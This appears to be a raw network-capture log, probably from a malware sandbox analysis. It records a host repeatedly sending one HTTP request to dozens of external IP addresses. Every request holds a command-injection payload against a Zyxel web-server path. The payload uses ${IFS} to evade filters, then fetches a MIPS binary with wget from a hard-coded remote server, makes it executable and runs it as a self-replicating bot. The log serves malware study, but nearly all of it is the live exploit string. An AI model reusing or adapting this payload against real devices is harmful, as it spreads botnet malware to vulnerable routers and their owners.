                                              Jan 29, 2024 07:03:58.165050030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6343192.168.2.144063671.133.48.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165108919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6344192.168.2.1451182104.92.31.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165160894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6345192.168.2.145648882.185.53.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165199995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6346192.168.2.143657418.53.237.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165225983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6347192.168.2.145300646.187.56.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165276051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6348192.168.2.144041418.27.232.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165318012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6349192.168.2.1440582166.76.93.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165339947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6350192.168.2.145826080.227.104.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165363073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6351192.168.2.143843466.73.77.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165399075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6352192.168.2.1451678212.187.193.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165446043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6353192.168.2.143520066.174.237.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165467024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6354192.168.2.1458614134.150.235.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165533066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6355192.168.2.143580631.127.128.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165550947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6356192.168.2.143990619.55.142.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165602922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6357192.168.2.1460310134.194.49.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165640116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6358192.168.2.145914269.89.209.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165694952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6359192.168.2.145988867.21.160.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165740013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6360192.168.2.1458082166.151.23.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165769100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6361192.168.2.144370820.182.83.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165822029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6362192.168.2.1450290131.170.112.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165853977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6363192.168.2.1437972208.161.233.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165913105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6364192.168.2.1458898192.61.242.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165930033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6365192.168.2.1459580102.196.204.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.165954113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6366192.168.2.145302835.144.236.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166009903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6367192.168.2.145564489.79.134.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166045904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6368192.168.2.14475342.149.99.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166074991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6369192.168.2.1457414149.194.77.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166100979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6370192.168.2.145237495.196.212.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166135073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6371192.168.2.1458916219.45.18.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166176081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6372192.168.2.1452056106.62.230.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166202068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6373192.168.2.143332873.168.69.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166248083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6374192.168.2.1437202193.173.252.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166280031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6375192.168.2.1449170118.119.106.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166306019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6376192.168.2.1436116146.125.105.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166362047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6377192.168.2.1440806191.123.139.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166414976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6378192.168.2.1441312192.120.65.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166441917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6379192.168.2.1438302165.235.88.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166481972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6380192.168.2.144341074.14.87.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166527987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6381192.168.2.145427485.228.85.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166564941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6382192.168.2.1440440162.119.49.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166596889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6383192.168.2.1455626208.124.223.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166632891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6384192.168.2.145702213.173.232.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166676998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6385192.168.2.145375494.157.75.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166712999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6386192.168.2.1439506100.213.182.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166738987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6387192.168.2.144669252.90.60.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166789055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6388192.168.2.143538094.18.155.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166826963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6389192.168.2.1451272198.16.93.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166866064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6390192.168.2.145340475.76.7.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166884899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6391192.168.2.1450308161.229.89.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166925907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6392192.168.2.144758027.36.116.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.166980982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6393192.168.2.1437996120.53.143.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167016983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6394192.168.2.1451894158.18.229.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167068005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6395192.168.2.1452010142.99.13.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167105913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6396192.168.2.143744834.23.137.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167171955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6397192.168.2.1440966138.51.114.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167203903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6398192.168.2.144210219.94.139.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167243958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6399192.168.2.1435652126.129.100.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167282104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6400192.168.2.144894085.231.216.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167336941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6401192.168.2.143539636.6.31.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167368889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6402192.168.2.145351023.143.68.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167424917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6403192.168.2.1434050132.107.193.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167442083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6404192.168.2.1456840200.94.176.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167481899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6405192.168.2.1459002162.141.71.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.167511940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6406192.168.2.1460974223.51.196.221443
                                              TimestampBytes transferredDirectionData
